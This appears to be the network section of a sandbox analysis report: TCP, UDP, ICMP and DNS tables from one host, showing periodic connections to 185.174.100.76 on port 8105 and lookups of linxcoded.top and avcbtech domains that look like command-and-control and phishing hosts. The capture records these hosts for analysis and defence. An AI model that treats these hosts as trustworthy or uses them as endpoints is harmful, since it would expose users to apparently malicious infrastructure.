Mar 20, 2025 23:54:19.812333107 CET	60884	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:54:19.812370062 CET	443	60884	104.26.13.205	192.168.2.24
Mar 20, 2025 23:54:19.812447071 CET	60884	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:54:19.812585115 CET	60884	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:54:19.812593937 CET	443	60884	104.26.13.205	192.168.2.24
Mar 20, 2025 23:54:19.857588053 CET	60883	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:54:20.017966032 CET	443	60884	104.26.13.205	192.168.2.24
Mar 20, 2025 23:54:20.018357992 CET	60884	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:54:20.018455029 CET	443	60884	104.26.13.205	192.168.2.24
Mar 20, 2025 23:54:20.018490076 CET	60884	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:54:20.018505096 CET	443	60884	104.26.13.205	192.168.2.24
Mar 20, 2025 23:54:20.163347960 CET	443	60882	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:20.163419008 CET	443	60882	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:20.163594007 CET	60882	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:20.164103031 CET	60882	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:20.164145947 CET	443	60882	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:20.172224045 CET	60885	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:20.172271967 CET	443	60885	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:20.172343969 CET	60885	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:20.172492981 CET	60885	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:20.172516108 CET	443	60885	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:20.441929102 CET	443	60884	104.26.13.205	192.168.2.24
Mar 20, 2025 23:54:20.442060947 CET	443	60884	104.26.13.205	192.168.2.24
Mar 20, 2025 23:54:20.442245007 CET	60884	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:54:20.443500042 CET	60884	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:54:20.443547010 CET	443	60884	104.26.13.205	192.168.2.24
Mar 20, 2025 23:54:20.444582939 CET	60883	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:54:20.446463108 CET	60886	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:54:20.446516991 CET	443	60886	104.26.12.205	192.168.2.24
Mar 20, 2025 23:54:20.446592093 CET	60886	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:54:20.446705103 CET	60886	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:54:20.446722984 CET	443	60886	104.26.12.205	192.168.2.24
Mar 20, 2025 23:54:20.476196051 CET	443	60885	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:20.476377964 CET	60885	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:20.476396084 CET	443	60885	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:20.476496935 CET	60885	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:20.476501942 CET	443	60885	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:20.634166002 CET	8105	60883	185.174.100.76	192.168.2.24
Mar 20, 2025 23:54:20.655421019 CET	443	60886	104.26.12.205	192.168.2.24
Mar 20, 2025 23:54:20.664453983 CET	60886	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:54:20.664541006 CET	443	60886	104.26.12.205	192.168.2.24
Mar 20, 2025 23:54:20.667799950 CET	60886	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:54:20.667815924 CET	443	60886	104.26.12.205	192.168.2.24
Mar 20, 2025 23:54:20.902916908 CET	443	60886	104.26.12.205	192.168.2.24
Mar 20, 2025 23:54:20.903053999 CET	443	60886	104.26.12.205	192.168.2.24
Mar 20, 2025 23:54:20.903126955 CET	60886	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:54:20.904025078 CET	60886	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:54:20.904077053 CET	443	60886	104.26.12.205	192.168.2.24
Mar 20, 2025 23:54:20.971813917 CET	443	60885	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:20.971877098 CET	443	60885	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:20.971944094 CET	60885	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:20.972353935 CET	60885	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:20.972366095 CET	443	60885	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:25.898966074 CET	60818	443	192.168.2.24	23.206.121.30
Mar 20, 2025 23:54:25.989793062 CET	443	60818	23.206.121.30	192.168.2.24
Mar 20, 2025 23:54:25.989814043 CET	443	60818	23.206.121.30	192.168.2.24
Mar 20, 2025 23:54:25.989998102 CET	60818	443	192.168.2.24	23.206.121.30
Mar 20, 2025 23:54:25.989998102 CET	60818	443	192.168.2.24	23.206.121.30
Mar 20, 2025 23:54:40.664417982 CET	60871	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:54:40.820727110 CET	8105	60871	185.174.100.76	192.168.2.24
Mar 20, 2025 23:54:45.119623899 CET	60852	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:54:45.270150900 CET	8105	60852	185.174.100.76	192.168.2.24
Mar 20, 2025 23:54:46.748980999 CET	60887	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:46.749072075 CET	443	60887	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:46.749332905 CET	60887	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:46.750150919 CET	60888	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:54:46.750468969 CET	60887	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:46.750550032 CET	443	60887	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:46.903707981 CET	8105	60888	185.174.100.76	192.168.2.24
Mar 20, 2025 23:54:46.903986931 CET	60888	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:54:46.904071093 CET	60888	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:54:47.056257963 CET	8105	60888	185.174.100.76	192.168.2.24
Mar 20, 2025 23:54:47.056583881 CET	60888	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:54:47.056797028 CET	60888	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:54:47.057354927 CET	443	60887	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:47.057672977 CET	60887	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:47.057672977 CET	60887	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:47.057760000 CET	443	60887	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:47.057794094 CET	443	60887	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:47.209644079 CET	8105	60888	185.174.100.76	192.168.2.24
Mar 20, 2025 23:54:47.209839106 CET	8105	60888	185.174.100.76	192.168.2.24
Mar 20, 2025 23:54:47.213310003 CET	60889	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:54:47.213340044 CET	443	60889	104.26.13.205	192.168.2.24
Mar 20, 2025 23:54:47.213438034 CET	60889	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:54:47.213596106 CET	60889	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:54:47.213603020 CET	443	60889	104.26.13.205	192.168.2.24
Mar 20, 2025 23:54:47.256603956 CET	60888	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:54:47.419048071 CET	443	60889	104.26.13.205	192.168.2.24
Mar 20, 2025 23:54:47.419374943 CET	60889	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:54:47.419392109 CET	443	60889	104.26.13.205	192.168.2.24
Mar 20, 2025 23:54:47.419595957 CET	60889	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:54:47.419600964 CET	443	60889	104.26.13.205	192.168.2.24
Mar 20, 2025 23:54:47.563673019 CET	443	60887	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:47.563724995 CET	443	60887	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:47.563936949 CET	60887	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:47.564846992 CET	60887	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:47.564889908 CET	443	60887	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:47.574369907 CET	60890	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:47.574457884 CET	443	60890	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:47.574552059 CET	60890	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:47.574743032 CET	60890	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:47.574768066 CET	443	60890	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:47.662076950 CET	443	60889	104.26.13.205	192.168.2.24
Mar 20, 2025 23:54:47.662213087 CET	443	60889	104.26.13.205	192.168.2.24
Mar 20, 2025 23:54:47.662297010 CET	60889	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:54:47.678654909 CET	60889	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:54:47.678670883 CET	443	60889	104.26.13.205	192.168.2.24
Mar 20, 2025 23:54:47.679685116 CET	60888	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:54:47.682277918 CET	60891	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:54:47.682300091 CET	443	60891	104.26.12.205	192.168.2.24
Mar 20, 2025 23:54:47.682398081 CET	60891	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:54:47.682497978 CET	60891	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:54:47.682503939 CET	443	60891	104.26.12.205	192.168.2.24
Mar 20, 2025 23:54:47.877002954 CET	8105	60888	185.174.100.76	192.168.2.24
Mar 20, 2025 23:54:47.899101973 CET	443	60891	104.26.12.205	192.168.2.24
Mar 20, 2025 23:54:47.899533987 CET	60891	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:54:47.899566889 CET	443	60891	104.26.12.205	192.168.2.24
Mar 20, 2025 23:54:47.899681091 CET	60891	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:54:47.899689913 CET	443	60891	104.26.12.205	192.168.2.24
Mar 20, 2025 23:54:48.152849913 CET	443	60891	104.26.12.205	192.168.2.24
Mar 20, 2025 23:54:48.153012991 CET	443	60891	104.26.12.205	192.168.2.24
Mar 20, 2025 23:54:48.153076887 CET	60891	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:54:48.161134958 CET	60891	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:54:48.161161900 CET	443	60891	104.26.12.205	192.168.2.24
Mar 20, 2025 23:54:48.901659012 CET	443	60890	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:48.901913881 CET	60890	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:48.901989937 CET	443	60890	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:48.902050972 CET	60890	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:48.902065039 CET	443	60890	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:49.411479950 CET	443	60890	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:49.411530972 CET	443	60890	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:49.411824942 CET	60890	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:49.412458897 CET	60890	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:49.412498951 CET	443	60890	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:52.992014885 CET	60856	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:54:53.144036055 CET	8105	60856	185.174.100.76	192.168.2.24
Mar 20, 2025 23:54:54.727866888 CET	60892	443	192.168.2.24	142.251.35.164
Mar 20, 2025 23:54:54.727900028 CET	443	60892	142.251.35.164	192.168.2.24
Mar 20, 2025 23:54:54.727974892 CET	60892	443	192.168.2.24	142.251.35.164
Mar 20, 2025 23:54:54.728156090 CET	60892	443	192.168.2.24	142.251.35.164
Mar 20, 2025 23:54:54.728159904 CET	443	60892	142.251.35.164	192.168.2.24
Mar 20, 2025 23:54:54.922251940 CET	443	60892	142.251.35.164	192.168.2.24
Mar 20, 2025 23:54:54.922619104 CET	60892	443	192.168.2.24	142.251.35.164
Mar 20, 2025 23:54:54.922631979 CET	443	60892	142.251.35.164	192.168.2.24
Mar 20, 2025 23:55:04.959352970 CET	443	60892	142.251.35.164	192.168.2.24
Mar 20, 2025 23:55:04.959417105 CET	443	60892	142.251.35.164	192.168.2.24
Mar 20, 2025 23:55:04.959460020 CET	60892	443	192.168.2.24	142.251.35.164
Mar 20, 2025 23:55:05.647725105 CET	60883	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:55:05.799006939 CET	8105	60883	185.174.100.76	192.168.2.24
Mar 20, 2025 23:55:06.049890041 CET	443	60817	2.19.122.66	192.168.2.24
Mar 20, 2025 23:55:06.049957037 CET	443	60817	2.19.122.66	192.168.2.24
Mar 20, 2025 23:55:06.050224066 CET	60817	443	192.168.2.24	2.19.122.66
Mar 20, 2025 23:55:06.050225019 CET	60817	443	192.168.2.24	2.19.122.66
Mar 20, 2025 23:55:06.050225019 CET	60817	443	192.168.2.24	2.19.122.66
Mar 20, 2025 23:55:06.351594925 CET	60817	443	192.168.2.24	2.19.122.66
Mar 20, 2025 23:55:06.400250912 CET	60892	443	192.168.2.24	142.251.35.164
Mar 20, 2025 23:55:06.400265932 CET	443	60892	142.251.35.164	192.168.2.24
Mar 20, 2025 23:55:06.519455910 CET	443	60817	2.19.122.66	192.168.2.24
Mar 20, 2025 23:55:25.820242882 CET	60871	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:55:25.980389118 CET	8105	60871	185.174.100.76	192.168.2.24
Mar 20, 2025 23:55:30.273346901 CET	60852	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:55:30.426765919 CET	8105	60852	185.174.100.76	192.168.2.24
Mar 20, 2025 23:55:32.882873058 CET	60888	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:55:33.034010887 CET	8105	60888	185.174.100.76	192.168.2.24
Mar 20, 2025 23:55:38.148811102 CET	60856	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:55:38.299318075 CET	8105	60856	185.174.100.76	192.168.2.24
Mar 20, 2025 23:55:50.804219007 CET	60883	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:55:50.954041004 CET	8105	60883	185.174.100.76	192.168.2.24
Mar 20, 2025 23:56:10.992635012 CET	60871	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:56:11.148648977 CET	8105	60871	185.174.100.76	192.168.2.24

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 20, 2025 23:52:45.838464975 CET	54215	53	192.168.2.24	1.1.1.1
Mar 20, 2025 23:52:45.974703074 CET	53	54215	1.1.1.1	192.168.2.24
Mar 20, 2025 23:52:50.362580061 CET	53	60183	1.1.1.1	192.168.2.24
Mar 20, 2025 23:52:50.377412081 CET	53	54877	1.1.1.1	192.168.2.24
Mar 20, 2025 23:52:51.112322092 CET	53	64818	1.1.1.1	192.168.2.24
Mar 20, 2025 23:52:51.311357021 CET	53	58107	1.1.1.1	192.168.2.24
Mar 20, 2025 23:52:54.619384050 CET	54740	53	192.168.2.24	1.1.1.1
Mar 20, 2025 23:52:54.619491100 CET	53717	53	192.168.2.24	1.1.1.1
Mar 20, 2025 23:52:54.722137928 CET	53	54740	1.1.1.1	192.168.2.24
Mar 20, 2025 23:52:55.626661062 CET	60319	53	192.168.2.24	1.1.1.1
Mar 20, 2025 23:52:55.626967907 CET	64398	53	192.168.2.24	1.1.1.1
Mar 20, 2025 23:52:55.830434084 CET	53	64398	1.1.1.1	192.168.2.24
Mar 20, 2025 23:52:55.861293077 CET	53	60319	1.1.1.1	192.168.2.24
Mar 20, 2025 23:52:57.122529984 CET	58463	53	192.168.2.24	1.1.1.1
Mar 20, 2025 23:52:57.122807026 CET	63840	53	192.168.2.24	1.1.1.1
Mar 20, 2025 23:52:58.135030985 CET	62306	53	192.168.2.24	1.1.1.1
Mar 20, 2025 23:52:58.135087967 CET	64767	53	192.168.2.24	1.1.1.1
Mar 20, 2025 23:52:58.413394928 CET	53	64767	1.1.1.1	192.168.2.24
Mar 20, 2025 23:52:58.417840004 CET	53	62306	1.1.1.1	192.168.2.24
Mar 20, 2025 23:52:58.652084112 CET	53	58463	1.1.1.1	192.168.2.24
Mar 20, 2025 23:52:58.653163910 CET	53	63840	1.1.1.1	192.168.2.24
Mar 20, 2025 23:52:59.980479002 CET	53	58698	1.1.1.1	192.168.2.24
Mar 20, 2025 23:53:00.631521940 CET	49291	53	192.168.2.24	1.1.1.1
Mar 20, 2025 23:53:00.631632090 CET	54400	53	192.168.2.24	1.1.1.1
Mar 20, 2025 23:53:00.730608940 CET	53	49291	1.1.1.1	192.168.2.24
Mar 20, 2025 23:53:00.730745077 CET	53	54400	1.1.1.1	192.168.2.24
Mar 20, 2025 23:53:01.321682930 CET	62012	53	192.168.2.24	1.1.1.1
Mar 20, 2025 23:53:01.321683884 CET	54173	53	192.168.2.24	1.1.1.1
Mar 20, 2025 23:53:01.419766903 CET	53	62012	1.1.1.1	192.168.2.24
Mar 20, 2025 23:53:01.420084953 CET	53	54173	1.1.1.1	192.168.2.24
Mar 20, 2025 23:53:01.896944046 CET	49644	53	192.168.2.24	1.1.1.1
Mar 20, 2025 23:53:01.897058964 CET	54954	53	192.168.2.24	1.1.1.1
Mar 20, 2025 23:53:01.995356083 CET	53	54954	1.1.1.1	192.168.2.24
Mar 20, 2025 23:53:01.997188091 CET	53	49644	1.1.1.1	192.168.2.24
Mar 20, 2025 23:53:08.221609116 CET	53	58478	1.1.1.1	192.168.2.24
Mar 20, 2025 23:53:13.422813892 CET	56122	53	192.168.2.24	1.1.1.1
Mar 20, 2025 23:53:13.422813892 CET	50858	53	192.168.2.24	1.1.1.1
Mar 20, 2025 23:53:13.706742048 CET	53	56122	1.1.1.1	192.168.2.24
Mar 20, 2025 23:53:13.788233042 CET	53	50858	1.1.1.1	192.168.2.24
Mar 20, 2025 23:53:14.216259003 CET	61387	53	192.168.2.24	1.1.1.1
Mar 20, 2025 23:53:14.216388941 CET	50768	53	192.168.2.24	1.1.1.1
Mar 20, 2025 23:53:14.313859940 CET	53	61387	1.1.1.1	192.168.2.24
Mar 20, 2025 23:53:14.315643072 CET	53	50768	1.1.1.1	192.168.2.24
Mar 20, 2025 23:53:14.770646095 CET	50995	53	192.168.2.24	1.1.1.1
Mar 20, 2025 23:53:14.770773888 CET	55128	53	192.168.2.24	1.1.1.1
Mar 20, 2025 23:53:14.868053913 CET	53	50995	1.1.1.1	192.168.2.24
Mar 20, 2025 23:53:14.869937897 CET	53	55128	1.1.1.1	192.168.2.24
Mar 20, 2025 23:53:19.686486006 CET	53	61424	1.1.1.1	192.168.2.24
Mar 20, 2025 23:53:20.479259014 CET	137	137	192.168.2.24	192.168.2.255
Mar 20, 2025 23:53:21.242960930 CET	137	137	192.168.2.24	192.168.2.255
Mar 20, 2025 23:53:21.723268032 CET	59010	53	192.168.2.24	1.1.1.1
Mar 20, 2025 23:53:21.723380089 CET	53660	53	192.168.2.24	1.1.1.1
Mar 20, 2025 23:53:22.007528067 CET	53	59010	1.1.1.1	192.168.2.24
Mar 20, 2025 23:53:22.008646011 CET	137	137	192.168.2.24	192.168.2.255
Mar 20, 2025 23:53:22.049345970 CET	53	53660	1.1.1.1	192.168.2.24
Mar 20, 2025 23:53:27.266311884 CET	53	54590	1.1.1.1	192.168.2.24
Mar 20, 2025 23:53:38.993202925 CET	62833	53	192.168.2.24	1.1.1.1
Mar 20, 2025 23:53:38.993549109 CET	55641	53	192.168.2.24	1.1.1.1
Mar 20, 2025 23:53:39.251034975 CET	53	62833	1.1.1.1	192.168.2.24
Mar 20, 2025 23:53:39.367677927 CET	53	55641	1.1.1.1	192.168.2.24
Mar 20, 2025 23:53:49.970756054 CET	53	61651	1.1.1.1	192.168.2.24
Mar 20, 2025 23:53:50.249353886 CET	53	58324	1.1.1.1	192.168.2.24
Mar 20, 2025 23:53:52.997920990 CET	53	62356	1.1.1.1	192.168.2.24
Mar 20, 2025 23:54:20.648806095 CET	53	50872	1.1.1.1	192.168.2.24
Mar 20, 2025 23:55:07.424382925 CET	53	59619	1.1.1.1	192.168.2.24
Mar 20, 2025 23:55:11.312675953 CET	138	138	192.168.2.24	192.168.2.255

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Mar 20, 2025 23:52:58.652152061 CET	192.168.2.24	1.1.1.1	c20e	(Port unreachable)	Destination Unreachable
Mar 20, 2025 23:53:13.788404942 CET	192.168.2.24	1.1.1.1	c252	(Port unreachable)	Destination Unreachable
Mar 20, 2025 23:53:39.367909908 CET	192.168.2.24	1.1.1.1	c24a	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 20, 2025 23:52:45.838464975 CET	192.168.2.24	1.1.1.1	0x824f	Standard query (0)	browser.events.data.msn.cn	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:52:54.619384050 CET	192.168.2.24	1.1.1.1	0xdce9	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:52:54.619491100 CET	192.168.2.24	1.1.1.1	0x9632	Standard query (0)	www.google.com	65	IN (0x0001)	false
Mar 20, 2025 23:52:55.626661062 CET	192.168.2.24	1.1.1.1	0x4ef1	Standard query (0)	office.avcbtech.store	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:52:55.626967907 CET	192.168.2.24	1.1.1.1	0x4ec6	Standard query (0)	office.avcbtech.store	65	IN (0x0001)	false
Mar 20, 2025 23:52:57.122529984 CET	192.168.2.24	1.1.1.1	0x4689	Standard query (0)	sender.linxcoded.top	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:52:57.122807026 CET	192.168.2.24	1.1.1.1	0xd19c	Standard query (0)	sender.linxcoded.top	65	IN (0x0001)	false
Mar 20, 2025 23:52:58.135030985 CET	192.168.2.24	1.1.1.1	0x676c	Standard query (0)	sender.linxcoded.top	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:52:58.135087967 CET	192.168.2.24	1.1.1.1	0xf6c6	Standard query (0)	sender.linxcoded.top	65	IN (0x0001)	false
Mar 20, 2025 23:53:00.631521940 CET	192.168.2.24	1.1.1.1	0xaed3	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:53:00.631632090 CET	192.168.2.24	1.1.1.1	0xc81e	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
Mar 20, 2025 23:53:01.321682930 CET	192.168.2.24	1.1.1.1	0x3fbe	Standard query (0)	i.imgur.com	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:53:01.321683884 CET	192.168.2.24	1.1.1.1	0x74d3	Standard query (0)	i.imgur.com	65	IN (0x0001)	false
Mar 20, 2025 23:53:01.896944046 CET	192.168.2.24	1.1.1.1	0x893e	Standard query (0)	i.imgur.com	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:53:01.897058964 CET	192.168.2.24	1.1.1.1	0x202a	Standard query (0)	i.imgur.com	65	IN (0x0001)	false
Mar 20, 2025 23:53:13.422813892 CET	192.168.2.24	1.1.1.1	0xeda4	Standard query (0)	server1.linxcoded.top	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:53:13.422813892 CET	192.168.2.24	1.1.1.1	0x88bd	Standard query (0)	_8105._https.server1.linxcoded.top	65	IN (0x0001)	false
Mar 20, 2025 23:53:14.216259003 CET	192.168.2.24	1.1.1.1	0x2405	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:53:14.216388941 CET	192.168.2.24	1.1.1.1	0xa0ab	Standard query (0)	api.ipify.org	65	IN (0x0001)	false
Mar 20, 2025 23:53:14.770646095 CET	192.168.2.24	1.1.1.1	0xb2ab	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:53:14.770773888 CET	192.168.2.24	1.1.1.1	0x9a15	Standard query (0)	api.ipify.org	65	IN (0x0001)	false
Mar 20, 2025 23:53:21.723268032 CET	192.168.2.24	1.1.1.1	0x424e	Standard query (0)	avcbtech.site	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:53:21.723380089 CET	192.168.2.24	1.1.1.1	0xe72f	Standard query (0)	avcbtech.site	65	IN (0x0001)	false
Mar 20, 2025 23:53:38.993202925 CET	192.168.2.24	1.1.1.1	0x729a	Standard query (0)	avcbtech.site	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:53:38.993549109 CET	192.168.2.24	1.1.1.1	0x1879	Standard query (0)	avcbtech.site	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 20, 2025 23:52:45.974703074 CET	1.1.1.1	192.168.2.24	0x824f	No error (0)	browser.events.data.msn.cn	global.asimov.events.data.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 20, 2025 23:52:45.974703074 CET	1.1.1.1	192.168.2.24	0x824f	No error (0)	global.asimov.events.data.trafficmanager.net	onedscolprdcus16.centralus.cloudapp.azure.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 20, 2025 23:52:45.974703074 CET	1.1.1.1	192.168.2.24	0x824f	No error (0)	onedscolprdcus16.centralus.cloudapp.azure.com		52.182.143.213	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:52:54.722137928 CET	1.1.1.1	192.168.2.24	0xdce9	No error (0)	www.google.com		142.251.35.164	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:52:55.861293077 CET	1.1.1.1	192.168.2.24	0x4ef1	No error (0)	office.avcbtech.store		139.28.36.38	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:52:58.417840004 CET	1.1.1.1	192.168.2.24	0x676c	No error (0)	sender.linxcoded.top		185.174.100.20	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:52:58.652084112 CET	1.1.1.1	192.168.2.24	0x4689	No error (0)	sender.linxcoded.top		185.174.100.20	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:53:00.730608940 CET	1.1.1.1	192.168.2.24	0xaed3	No error (0)	code.jquery.com		151.101.66.137	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:53:00.730608940 CET	1.1.1.1	192.168.2.24	0xaed3	No error (0)	code.jquery.com		151.101.194.137	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:53:00.730608940 CET	1.1.1.1	192.168.2.24	0xaed3	No error (0)	code.jquery.com		151.101.2.137	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:53:00.730608940 CET	1.1.1.1	192.168.2.24	0xaed3	No error (0)	code.jquery.com		151.101.130.137	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:53:01.419766903 CET	1.1.1.1	192.168.2.24	0x3fbe	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 20, 2025 23:53:01.419766903 CET	1.1.1.1	192.168.2.24	0x3fbe	No error (0)	ipv4.imgur.map.fastly.net		199.232.196.193	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:53:01.419766903 CET	1.1.1.1	192.168.2.24	0x3fbe	No error (0)	ipv4.imgur.map.fastly.net		199.232.192.193	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:53:01.420084953 CET	1.1.1.1	192.168.2.24	0x74d3	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 20, 2025 23:53:01.420949936 CET	1.1.1.1	192.168.2.24	0x7982	No error (0)	shed.dual-low.s-part-0012.t-0009.t-msedge.net	s-part-0012.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 20, 2025 23:53:01.420949936 CET	1.1.1.1	192.168.2.24	0x7982	No error (0)	s-part-0012.t-0009.t-msedge.net		13.107.246.40	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:53:01.995356083 CET	1.1.1.1	192.168.2.24	0x202a	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 20, 2025 23:53:01.997188091 CET	1.1.1.1	192.168.2.24	0x893e	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 20, 2025 23:53:01.997188091 CET	1.1.1.1	192.168.2.24	0x893e	No error (0)	ipv4.imgur.map.fastly.net		199.232.196.193	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:53:01.997188091 CET	1.1.1.1	192.168.2.24	0x893e	No error (0)	ipv4.imgur.map.fastly.net		199.232.192.193	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:53:02.368387938 CET	1.1.1.1	192.168.2.24	0x7b95	No error (0)	shed.dual-low.s-part-0012.t-0009.t-msedge.net	s-part-0012.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 20, 2025 23:53:02.368387938 CET	1.1.1.1	192.168.2.24	0x7b95	No error (0)	s-part-0012.t-0009.t-msedge.net		13.107.246.40	A (IP address)	IN (0x0001)	false
